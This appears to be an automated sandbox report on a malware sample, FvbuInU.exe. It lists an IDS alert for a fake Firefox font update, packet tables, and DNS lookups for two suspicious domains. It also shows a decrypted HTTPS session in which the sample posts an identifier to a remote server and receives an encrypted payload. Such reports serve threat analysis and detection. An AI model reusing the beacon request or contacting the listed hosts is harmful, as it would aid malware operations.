2025-03-07T19:38:15.919366+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49694	104.21.53.52	443	TCP
2025-03-07T19:38:23.280842+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49695	104.21.53.52	443	TCP
2025-03-07T19:38:31.004250+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49696	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 19:37:28.258949041 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:28.258990049 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:28.259090900 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:28.265896082 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:28.265938044 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:30.899045944 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:30.899122953 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:30.902791023 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:30.902803898 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:30.903151989 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:30.944359064 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:30.955811024 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:30.955811024 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:30.955962896 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.097306013 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.097364902 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.097461939 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.097484112 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.147475004 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.295875072 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.297554970 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.297632933 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.297647953 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.304944992 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.305018902 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.305027962 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.311408043 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.311469078 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.311484098 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.318043947 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.318119049 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.318125963 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.318146944 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.318197012 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.321014881 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.321036100 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.321043015 CET	49687	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.321049929 CET	443	49687	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.507045984 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.507107019 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:32.507257938 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.507700920 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:32.507711887 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:36.436429977 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:36.436559916 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:36.437825918 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:36.437834024 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:36.438069105 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:36.439328909 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:36.439328909 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:36.439358950 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:36.439529896 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:36.480317116 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:38.162384987 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:38.162484884 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:38.162564039 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:38.162671089 CET	49688	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:38.162686110 CET	443	49688	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:38.283497095 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:38.283551931 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:38.283633947 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:38.283953905 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:38.283971071 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:41.093813896 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:41.094079971 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:41.096234083 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:41.096242905 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:41.096565962 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:41.097881079 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:41.098064899 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:41.098092079 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:41.098167896 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:41.140336037 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:42.984563112 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:42.984677076 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:42.984730959 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:42.984811068 CET	49689	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:42.984831095 CET	443	49689	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:43.257678032 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:43.257719994 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:43.257813931 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:43.258198023 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:43.258214951 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:46.246195078 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:46.246258020 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:46.247942924 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:46.247951984 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:46.248184919 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:46.249579906 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:46.249733925 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:46.249761105 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:46.249816895 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:46.249825954 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:47.496529102 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:47.496630907 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:47.496731043 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:47.605058908 CET	49690	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:47.605114937 CET	443	49690	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:49.404318094 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:49.404352903 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:49.404472113 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:49.404762983 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:49.404786110 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:52.577363014 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:52.577430010 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:52.579380989 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:52.579389095 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:52.579747915 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:37:52.581717014 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:52.581821918 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:37:52.581861973 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:13.323345900 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:13.323432922 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:13.323509932 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:13.323668957 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:13.323682070 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:13.323693037 CET	49691	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:13.323698997 CET	443	49691	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:13.830976009 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:13.831017017 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:13.831104040 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:13.831410885 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:13.831427097 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.919251919 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.919365883 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.922475100 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.922483921 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.922921896 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.941612959 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.942413092 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.942495108 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.942584991 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.942964077 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.943070889 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.943270922 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.943356037 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.943548918 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.943564892 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.943615913 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.943643093 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.943685055 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.943768024 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.943998098 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944149017 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944174051 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944370031 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944395065 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944403887 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944411039 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944574118 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944591045 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944613934 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944622040 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944628954 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944639921 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944668055 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944688082 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944690943 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944700003 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944739103 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944763899 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:15.944806099 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944835901 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:15.944952011 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:21.514141083 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:21.514246941 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:21.514437914 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:21.514810085 CET	49694	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:21.514827013 CET	443	49694	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:21.549484968 CET	49695	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:21.549518108 CET	443	49695	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:21.549598932 CET	49695	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:21.549920082 CET	49695	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:21.549928904 CET	443	49695	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:23.280617952 CET	443	49695	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:23.280842066 CET	49695	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:23.282191992 CET	49695	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:23.282203913 CET	443	49695	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:23.282478094 CET	443	49695	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:23.283749104 CET	49695	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:23.283777952 CET	49695	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:23.283826113 CET	443	49695	104.21.53.52	192.168.2.6
Mar 7, 2025 19:38:28.181068897 CET	49695	443	192.168.2.6	104.21.53.52
Mar 7, 2025 19:38:28.209577084 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:28.209626913 CET	443	49696	188.114.96.3	192.168.2.6
Mar 7, 2025 19:38:28.209705114 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:28.210282087 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:28.210292101 CET	443	49696	188.114.96.3	192.168.2.6
Mar 7, 2025 19:38:31.004162073 CET	443	49696	188.114.96.3	192.168.2.6
Mar 7, 2025 19:38:31.004250050 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:31.006247044 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:31.006257057 CET	443	49696	188.114.96.3	192.168.2.6
Mar 7, 2025 19:38:31.006525040 CET	443	49696	188.114.96.3	192.168.2.6
Mar 7, 2025 19:38:31.008213043 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:31.008229971 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:31.008343935 CET	443	49696	188.114.96.3	192.168.2.6
Mar 7, 2025 19:38:32.859915018 CET	443	49696	188.114.96.3	192.168.2.6
Mar 7, 2025 19:38:32.860008955 CET	443	49696	188.114.96.3	192.168.2.6
Mar 7, 2025 19:38:32.860060930 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:32.860385895 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:32.860405922 CET	443	49696	188.114.96.3	192.168.2.6
Mar 7, 2025 19:38:32.860440969 CET	49696	443	192.168.2.6	188.114.96.3
Mar 7, 2025 19:38:32.860447884 CET	443	49696	188.114.96.3	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 19:37:28.220690012 CET	52871	53	192.168.2.6	1.1.1.1
Mar 7, 2025 19:37:28.234425068 CET	53	52871	1.1.1.1	192.168.2.6
Mar 7, 2025 19:38:28.188555956 CET	52430	53	192.168.2.6	1.1.1.1
Mar 7, 2025 19:38:28.198329926 CET	53	52430	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 19:37:28.220690012 CET	192.168.2.6	1.1.1.1	0xba95	Standard query (0)	nebdulaq.digital	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:38:28.188555956 CET	192.168.2.6	1.1.1.1	0xb623	Standard query (0)	begindecafer.world	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 19:37:28.234425068 CET	1.1.1.1	192.168.2.6	0xba95	No error (0)	nebdulaq.digital	104.21.53.52	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:37:28.234425068 CET	1.1.1.1	192.168.2.6	0xba95	No error (0)	nebdulaq.digital	172.67.209.33	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:38:28.198329926 CET	1.1.1.1	192.168.2.6	0xb623	No error (0)	begindecafer.world	188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:38:28.198329926 CET	1.1.1.1	192.168.2.6	0xb623	No error (0)	begindecafer.world	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

nebdulaq.digital

begindecafer.world

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49687	104.21.53.52	443	7544	C:\Users\user\Desktop\FvbuInU.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:37:30 UTC	266	OUT	POST /aQwdw HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: nebdulaq.digital
2025-03-07 18:37:30 UTC	47	OUT	Data Raw: 75 69 64 3d 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 26 63 69 64 3d Data Ascii: uid=9c3be6f4c5e0a94b189ca0d8299f35fd794488&cid=
2025-03-07 18:37:32 UTC	775	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:37:31 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kdvsuq7qqsHsUIOK0UILPripbe6uqs3h6bzPCFMh9JJPpBTfRVunwf2I4llQJpCLQFb4mRCkgypufVfk47awOHi3xQzELqdPf5OdAB7G9rZWdO1BcJErhjHW6BST%2B9Qqnt81"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc345ef971fa23-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=565&min_rtt=543&rtt_var=166&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=949&delivery_rate=7073345&cwnd=252&unsent_bytes=0&cid=11dfee99772da5ae&ts=1098&x=0"
2025-03-07 18:37:32 UTC	594	IN	Data Raw: 1c a6 eb 56 a9 45 70 06 3e 85 8b 1c 7d d2 3a 25 e7 6c a6 63 59 fd fb ee 19 6a 2c a7 0d 59 a7 2c 74 51 fa d1 cb 64 d7 f0 bf 96 a6 4f 55 ad 66 0f 0e 46 04 51 7d b8 70 79 52 96 83 6d 2f 82 df 03 82 67 91 1f 98 b7 f4 ef 41 d6 b7 75 b7 a6 95 82 39 4f cc b8 27 5f 2e 69 2c 59 87 91 ea b9 29 cb ce 69 57 95 87 ec 91 bd d7 10 85 ac d3 5e cd 8e 5d f0 7b 76 72 ff af da 4c 3b b4 74 05 39 0c 66 72 2b 5f 07 df 62 38 69 7c d1 0e bd 09 57 40 15 86 e1 81 ea 6d c1 13 5f 0b 8a 36 44 f5 5e 6e cc d5 e9 b0 b3 7f 24 4f ab e4 7d 85 46 e3 76 99 4d f6 bf 73 bc 69 77 08 1c c2 bb 23 7e 17 83 99 78 b5 48 89 0c f2 80 2e 2b 07 ff ca 32 3e 24 27 c9 b4 1d 35 0e ae 7d 69 a9 63 05 d7 09 d0 4c b1 8b 18 85 ba 29 af d1 dd b5 98 2d 93 28 76 45 36 be a2 8e 01 e4 a6 bd 98 9d b3 33 5c a7 92 bb c6 Data Ascii: VEp>}:%lcYj,Y,tQdOUfFQ}pyRm/gAu9O'_.i,Y)iW^]{vrL;t9fr+_b8i\|W@m_6D^n$O}FvMsiw#~xH.+2>$'5}icL)-(vE63\
2025-03-07 18:37:32 UTC	1369	IN	Data Raw: c2 9e 5e 0a f0 08 27 d2 82 c7 94 b2 d0 07 09 f0 57 2e b7 f4 00 ff be 17 e1 10 91 1f 68 d1 f1 9c 0a ed b9 dd 35 63 9a 2b 40 a9 97 9d e7 e3 c3 66 6d 2a 74 9b a8 ca 64 61 a8 2d d2 63 31 a7 e7 74 2b 65 3e 3a 26 7c 4a 97 3b a2 0f 46 eb 84 12 1c c0 9e f7 be 08 c8 ae 31 c5 9c 15 0e 24 b1 b4 d7 d8 fa 8b c4 c4 8a 39 15 95 5b 6a 20 e3 30 8c b1 47 3b 63 9d 2f b6 b7 ae 58 8e 6a 34 2d 99 21 fa a5 d9 4e dc 7a 76 b0 07 24 5b cb 05 bf 1c e5 28 ad db ca 93 89 fc de e4 1d f5 17 dc a2 1a c8 25 d7 13 9b 09 5b 9d 92 89 33 c7 12 ad 7f c0 21 8b be 66 26 aa d4 8a 80 51 aa 5f 94 0f 6a 3c 4f fa e1 8e ee 2d 6f c9 2b ce 8f 32 d2 c7 ff e5 a4 23 11 d0 2d 1c 03 14 1c 97 f5 e0 fe b1 69 fc a5 49 d9 d3 0b c4 44 3a d1 3f eb 4e 5e f5 15 8e ca a4 2b 66 24 49 7e 3a b3 12 ee c3 a3 9b 14 ec 90 Data Ascii: ^'W.h5c+@fm*tda-c1t+e>:&\|J;F1$9[j 0G;c/Xj4-!Nzv$[(%[3!f&Q_j<O-o+2#-iID:?N^+f$I~:
2025-03-07 18:37:32 UTC	1369	IN	Data Raw: 21 ca d9 e5 d0 b7 b7 de 9c 33 13 d6 f0 70 98 53 39 38 3a 96 aa c6 f3 35 35 aa 08 ca 33 dd dc 92 49 c4 8d 4a c0 52 69 67 70 aa 74 dd 2c bd e7 6c 96 ce 6f ee 47 f2 f2 d8 5a b2 9f 43 5f 46 60 78 dd 15 9a 80 b7 06 a3 4b 5a 7e a7 cf bf 6f a5 25 6a ae 90 fd aa 92 e7 4f 57 f2 10 11 1c 48 79 0c ad ae bc 43 27 95 5a ac ff ce 11 8e 5e 05 99 fb 11 a0 5c 91 7c 8f 2a 96 0e 18 7e d7 e9 23 83 49 55 8b 4d 3f ec fb 28 40 56 37 06 c9 1e f9 bd a7 51 09 31 ea da c9 e6 9a 04 c4 9f ad 66 52 19 25 1b d7 17 3a 11 bd e5 3a d4 5d f5 23 db c5 ac f7 da 3b 91 82 2f 7c 11 3f d3 51 72 d7 39 32 6a a0 99 c6 14 ed e0 5e 68 d9 52 c8 7a e8 64 ed 79 a9 0d d0 4a 0a 7a aa 61 5b e6 b2 e7 47 02 a4 7e ed 02 bb 6a f5 2e 1a 4b 6f 18 8b 48 7d 0d e2 b2 1c 4f c8 56 ff 42 ca 1e 43 08 65 80 09 cd bf 1f Data Ascii: !3pS98:553IJRigpt,loGZC_F`xKZ~o%jOWHyC'Z^\\|*~#IUM?(@V7Q1fR%::]#;/\|?Qr92j^hRzdyJza[G~j.KoH}OVBCe
2025-03-07 18:37:32 UTC	1369	IN	Data Raw: 0a d4 4f e6 53 6e 6f 2e ad 82 79 c0 f6 fe 9d 7a 86 99 47 22 58 4e 0b 0f 6b ce 1c 30 63 c6 d4 6b 68 8b 64 ea 3a dc cf 94 a5 b1 dd c5 10 a5 53 3d c0 7d 09 5f c9 24 b2 38 8f c7 7f 86 d7 b3 15 43 4f ac e6 71 f5 e6 80 f9 b8 88 9b 23 8e 2d d4 72 4d ed e3 89 81 0a 6d e7 75 8c 88 31 b8 b8 44 f3 80 c2 cc f1 11 12 9e 37 1a 07 a7 75 f1 f8 b5 df d8 af c3 ea 46 b9 3f 45 ea 4e 2d c1 e4 e5 dd 3d 24 62 74 28 17 4c 05 90 53 37 b0 6a 3c f2 9c 1e 60 8c 47 4a 6b a2 24 4f 49 65 89 e0 e2 bd ef 3a f0 b6 20 e9 56 2b b5 19 02 95 ec d1 16 6c 00 77 61 66 a2 bc 90 1b e4 1b 13 9d 6e af d8 e7 88 79 5a 7f 4f 4c 6e 30 33 c5 6c 8e cb 65 34 70 ac 15 f0 1d d7 18 20 fa 84 d1 8b 17 9e 04 76 d3 bb bf 65 7c 9c 45 14 78 0e 64 a0 ac 20 28 dc 73 c9 42 94 9d 76 1e d5 ba 29 fd 38 e4 88 58 0c 25 13 Data Ascii: OSno.yzG"XNk0ckhd:S=}_$8COq#-rMmu1D7uF?EN-=$bt(LS7j<`GJk$OIe: V+lwafnyZOLn03le4p ve\|Exd (sBv)8X%
2025-03-07 18:37:32 UTC	1369	IN	Data Raw: bf 6a 78 17 44 2d b3 11 35 dd bd 0e ad 43 38 3b 18 86 95 ad de bd 63 56 8a b7 3b 9e e1 27 78 b1 c2 6f 70 bf 11 11 bb 95 ac d6 86 df 2f fc b1 9f 39 4a 32 29 99 58 55 57 00 5f bb 86 9e 45 58 20 22 30 8d 9e b9 33 ba 10 0d f7 12 67 81 8b 3d 19 f0 b7 dc 96 63 cd 1f 5e 6a e1 0b 6e 9f b7 7a 09 84 4b 8e 81 2a e3 ce ff ca 2a 95 22 21 9a 17 c4 2a 05 e7 d7 be dc 4a c7 78 14 a2 85 56 60 d6 2f 01 37 34 75 b6 f4 c8 44 f0 93 cd 18 be 0c 7d 68 f9 1f 1b 32 1b 71 a7 a1 34 12 b7 0a b5 ba 30 50 f3 57 78 62 b8 48 f1 e4 fe 0f c8 7d 3e 0e cb 7e 51 ac 24 4d 18 ee 6c 72 ed d6 30 17 50 12 c1 ff 72 1b dc aa 8a a2 1e 56 5a 05 92 de 4e bc 4e 18 a1 14 6e 76 2e 2b 0a 21 1c 6f 26 3f 4e 9d 69 01 30 82 e6 d1 ca 5c 3f a7 43 cb c7 3a 1a 36 90 94 fe 2e 83 a7 27 b2 cb a6 92 a7 b0 04 7d 7c ce Data Ascii: jxD-5C8;cV;'xop/9J2)XUW_EX "03g=c^jnzK*"!JxV`/74uD}h2q40PWxbH}>~Q$Mlr0PrVZNNnv.+!o&?Ni0\?C:6.'}\|
